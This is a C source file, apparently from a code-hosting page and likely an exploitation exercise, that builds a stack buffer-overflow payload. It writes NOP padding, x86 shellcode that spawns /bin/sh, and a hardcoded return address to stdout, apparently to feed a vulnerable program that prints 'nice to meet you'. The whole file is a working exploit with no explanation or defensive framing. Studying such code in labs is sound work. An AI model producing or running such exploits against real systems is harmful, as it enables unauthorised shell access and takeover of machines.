You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
47 lines
1.1 KiB
47 lines
1.1 KiB
#include <unistd.h> // for write
|
|
#include <stdint.h> // for uint32_t
|
|
#include <string.h> // for strlen
|
|
#include <stdlib.h> // for free, calloc
|
|
#include <stdio.h> // fprintf
|
|
|
|
#define BUFFER_SIZE 1024
|
|
#define HELLO_MSG "nice to meet you "
|
|
|
|
const char shellcode[] =
|
|
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
|
|
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
|
|
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
|
|
"\xff\xff/bin/sh";
|
|
|
|
uint32_t ret = 0xbf85b4e0;
|
|
|
|
int main(void) {
|
|
size_t hello_size = strlen(HELLO_MSG);
|
|
size_t code_size = sizeof(shellcode) - 1;
|
|
|
|
fprintf(stderr, "hello_size = %d\n", hello_size);
|
|
fprintf(stderr, "code_size = %d\n", code_size);
|
|
|
|
size_t bourrage = BUFFER_SIZE - hello_size - code_size + 12;
|
|
ret += hello_size + 20; //
|
|
|
|
fprintf(stderr, "bourrage = %d\n", bourrage);
|
|
fprintf(stderr, "ret = %#x\n", ret);
|
|
|
|
char * buffer = malloc(bourrage);
|
|
int i;
|
|
for (i = 0; i < bourrage; i++) {
|
|
buffer[i] = 0x90; // NOP
|
|
}
|
|
|
|
write(1, buffer, 40);
|
|
write(1, shellcode, code_size);
|
|
write(1, buffer, bourrage - 40);
|
|
|
|
write(1, &ret, sizeof(ret));
|
|
write(1, "\n", 1);
|
|
|
|
free(buffer);
|
|
|
|
return 0;
|
|
}
|
|
|